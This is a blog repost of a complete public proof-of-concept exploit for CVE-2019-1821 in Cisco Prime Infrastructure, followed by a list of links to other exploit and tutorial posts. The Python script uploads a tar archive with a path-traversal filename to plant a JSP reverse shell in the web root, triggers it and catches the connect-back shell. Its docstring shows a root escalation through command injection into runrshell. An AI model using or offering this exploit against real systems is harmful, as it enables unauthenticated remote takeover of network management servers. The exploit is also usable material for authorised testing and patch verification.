CVE-2019-1821 Cisco Prime Infrastructure Remote Code Execution
https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html

Cscan思科扫描插件 (IP/Port/HostName/Boot/Version)
https://www.cnblogs.com/k8gege/p/10679491.html

CVE-2019-1821 Exploit

#!/usr/bin/python

"""

Cisco Prime Infrastructure Health Monitor HA TarArchive Directory Traversal Remote Code Execution Vulnerability

Steven Seeley (mr_me) of Source Incite - 2019

SRC: SRC-2019-0034

CVE: CVE-2019-1821

Example:

========

saturn:~ mr_me$ ./poc.py

(+) usage: ./poc.py <target> <connectback:port>

(+) eg: ./poc.py 192.168.100.123 192.168.100.2:4444

saturn:~ mr_me$ ./poc.py 192.168.100.123 192.168.100.2:4444

(+) planted backdoor!

(+) starting handler on port 4444

(+) connection from 192.168.100.123

(+) pop thy shell!

python -c 'import pty; pty.spawn("/bin/bash")'

[prime@piconsole CSCOlumos]$ /opt/CSCOlumos/bin/runrshell '" && /bin/sh #'

/opt/CSCOlumos/bin/runrshell '" && /bin/sh #'

sh-4.1# /usr/bin/id

/usr/bin/id

uid=0(root) gid=0(root) groups=0(root),110(gadmin),201(xmpdba) context=system_u:system_r:unconfined_java_t:s0

sh-4.1# exit

exit

exit

[prime@piconsole CSCOlumos]$ exit

exit

exit

"""

import sys

import socket

import requests

import tarfile

import telnetlib

from threading import Thread

from cStringIO import StringIO

from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def _build_tar(ls, lp):

    """

    build the tar archive without touching disk

    """

    f = StringIO()

    b = _get_jsp(ls, lp)

    t = tarfile.TarInfo("../../opt/CSCOlumos/tomcat/webapps/ROOT/si.jsp")

    t.size = len(b)

    with tarfile.open(fileobj=f, mode="w") as tar:

        tar.addfile(t, StringIO(b))

    return f.getvalue()

def _get_jsp(ls, lp):

    jsp = """<%@page import="java.lang.*"%>

<%@page import="java.util.*"%>

<%@page import="java.io.*"%>

<%@page import="java.net.*"%>

<%

  class StreamConnector extends Thread

  {

    InputStream sv;

    OutputStream tp;

    StreamConnector( InputStream sv, OutputStream tp )

    {

      this.sv = sv;

      this.tp = tp;

    }

    public void run()

    {

      BufferedReader za  = null;

      BufferedWriter hjr = null;

      try

      {

        za  = new BufferedReader( new InputStreamReader( this.sv ) );

        hjr = new BufferedWriter( new OutputStreamWriter( this.tp ) );

        char buffer[] = new char[8192];

        int length;

        while( ( length = za.read( buffer, 0, buffer.length ) ) > 0 )

        {

          hjr.write( buffer, 0, length );

          hjr.flush();

        }

      } catch( Exception e ){}

      try

      {

        if( za != null )

          za.close();

        if( hjr != null )

          hjr.close();

      } catch( Exception e ){}

    }

  }

  try

  {

    String ShellPath = new String("/bin/sh");

    Socket socket = new Socket("__IP__", __PORT__);

    Process process = Runtime.getRuntime().exec( ShellPath );

    ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();

    ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();

  } catch( Exception e ) {}

%>"""

    return jsp.replace("__IP__", ls).replace("__PORT__", str(lp))

def handler(lp):

    """

    This is the client handler, to catch the connectback

    """

    print "(+) starting handler on port %d" % lp

    t = telnetlib.Telnet()

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    s.bind(("0.0.0.0", lp))

    s.listen(1)

    conn, addr = s.accept()

    print  "(+) connection from %s" % addr[0]

    t.sock = conn

    print "(+) pop thy shell!"

    t.interact()

def exec_code(t, lp):

    """

    This function threads the client handler and sends off the attacking payload

    """

    handlerthr = Thread(target=handler, args=(lp,))

    handlerthr.start()

    r = requests.get("https://%s/si.jsp" % t, verify=False)

def we_can_upload(t, ls, lp):

    """

    This is where we take advantage of the vulnerability

    """

    td = _build_tar(ls, lp)

    bd = {'files': ('si.tar', td)}

    h = {

      'Destination-Dir': 'tftpRoot',

      'Compressed-Archive': "false",

      'Primary-IP' : '127.0.0.1',

      'Filecount' : "1",

      'Filename': "si.tar",

      'Filesize' : str(len(td)),

    }

    r = requests.post("https://%s:8082/servlet/UploadServlet" % t, headers=h, files=bd, verify=False)

    if r.status_code == 200:

        return True

    return False

def main():

    if len(sys.argv) != 3:

        print "(+) usage: %s <target> <connectback:port>" % sys.argv[0]

        print "(+) eg: %s 192.168.100.123 192.168.100.2:4444" % sys.argv[0]

        sys.exit(-1)

    t  = sys.argv[1]

    cb = sys.argv[2]

    if not ":" in cb:

        print "(+) using default connectback port 4444"

        ls = cb

        lp = 4444

    else:

        if not cb.split(":")[1].isdigit():

            print "(-) %s is not a port number!" % cb.split(":")[1]

            sys.exit(-1)

        ls = cb.split(":")[0]

        lp = int(cb.split(":")[1])

    if we_can_upload(t, ls, lp):

        print "(+) planted backdoor!"

        exec_code(t, lp)

if __name__ == '__main__':

    main()

收藏的一些Exphttps://github.com/k8gege/CiscoExploit

[EXP]CVE-2019-1821 Cisco Prime Infrastructure思科未授权远程代码执行漏洞的更多相关文章

  1. PHP-FPM 远程代码执行漏洞(CVE-2019-11043)复现-含EXP

    搭建容器 安装golang 利用程序 https://github.com/neex/phuip-fpizdam 安装git Cobra包安装 go get -v github.com/spf13/c ...

  2. windows 快捷方式(.lnk)代码执行漏洞(CVE-2017-8464 )[附EXP生成工具]

    最近看到网上曝光了一个windows远程代码执行的漏洞,黑客可以通过一个快捷方式在用户电脑上执行任意指令,于是便对该漏洞进行了部分分析. 1. 漏洞描述: MicrosoftWindows .LNK  ...

  3. FlexPaper 2.3.6 远程命令执行漏洞 附Exp

    影响版本:小于FlexPaper 2.3.6的所有版本 FlexPaper (https://www.flowpaper.com) 是一个开源项目,遵循GPL协议,在互联网上非常流行.它为web客户端 ...

  4. Cisco Smart Install远程命令执行漏洞

    0x01前言 在Smart Install Client代码中发现了基于堆栈的缓冲区溢出漏洞,该漏洞攻击者无需身份验证登录即可远程执行任意代码.cisco Smart Install是一种“即插即用” ...

  5. Joomla![1.5-3.4.5]反序列化远程代码执行EXP(直接写shell)

    Usage:x.py http://xxx.com # coding=utf-8# author:KuuKi# Help: joomla 1.5-3.4.5 unserialize remote co ...

  6. “全栈2019”Java异常第二十一章:finally不被执行的情况

    难度 初级 学习时间 10分钟 适合人群 零基础 开发语言 Java 开发环境 JDK v11 IntelliJ IDEA v2018.3 文章原文链接 "全栈2019"Java异 ...

  7. “全栈2019”Java异常第五章:一定会被执行的finally代码块

    难度 初级 学习时间 10分钟 适合人群 零基础 开发语言 Java 开发环境 JDK v11 IntelliJ IDEA v2018.3 文章原文链接 "全栈2019"Java异 ...

  8. “全栈2019”Java第四十二章:静态代码块与初始化顺序

    难度 初级 学习时间 10分钟 适合人群 零基础 开发语言 Java 开发环境 JDK v11 IntelliJ IDEA v2018.3 文章原文链接 "全栈2019"Java第 ...

  9. RHSA-2017:2029-中危: openssh 安全和BUG修复更新(存在EXP、代码执行、本地提权)

    [root@localhost ~]# cat /etc/redhat-release CentOS Linux release 7.2.1511 (Core) 修复命令: 使用root账号登陆She ...

随机推荐

  1. 实验吧——看起来有点难(sql盲注)

    题目地址:http://ctf5.shiyanbar.com/basic/inject/ 首先当然是拿admin/admin来试试啊,多次测试发现,有两种错误提示 1.数据库连接失败! 2.登录失败, ...

  2. 《2017年-2018年中国MES软件及服务市场研究报告》正式发布!

    <2017年-2018年中国MES软件及服务市场研究报告>由e-works Research研究编写,报告深度分析了2017年及2018年中国MES市场发展状况,从市场规模.市场特点.需求 ...

  3. UIPickerView基本使用

    UIPickerView是很常用的一个UI控件,在各种购物平台选择地址时候都是必备的,下面我们来说一下具体的使用 首先UIPickerView的创建,与多数控件一样,分配内存并设置位置尺寸. 重要的的 ...

  4. telnet: connect to address 192.168.120.32: No route to host

    原因是 防火墙没有开端口. telnet 测试 3306端口,报错 telnet: connect to address 192.168.120.32: No route to host 再次链接就可 ...

  5. Linux文件服务管理之vsftpd

    简介 vsftpd是 "very secure FTP deamon"的缩写,是一个完全免费,开源的ftp服务器软件. 特点 小巧轻快,安全易用,支持虚拟用户.支持带宽限制等功能. ...

  6. nbu虚拟机恢复样例(之后补图)

    9.2.1进入Backup,Archive,and Restore管理器 9.2.2选择客户端和策略类型 9.2.3选择恢复的虚拟机 9.2.4恢复虚拟机到不同目录 9.2.5更改虚拟机名称和存储 因 ...

  7. arXiv上传文章latex源码技巧

    <<2019.09.27>>更新 上传PS文件看来也是不行了,一大早收到邮件被arXiv标记为incomplete了.哎,还是老老实实提交Latex source files吧 ...

  8. 从架构开始谈dubbo(二)-----zookeeper安装和dubbo文档查阅

    一.Zookeeper下载与安装 1.官网地址下载 https://zookeeper.apache.org/ 2.找到图中英文位置(英文不好,安图操作就好了,计算机很多东西如果你没法很好的记忆,就画 ...

  9. 05-cmake语法-message()

    输出错误 message(FATAL_ERROR " FATAL: In-source builds are not allowed. You should create a separat ...

  10. 线程queue、线程进程池,协程

    线程queue import queue q = queue.Queue() #先进先出 q = queue.LifoQueue() #先进后出 t = queue.PriorityQueue() # ...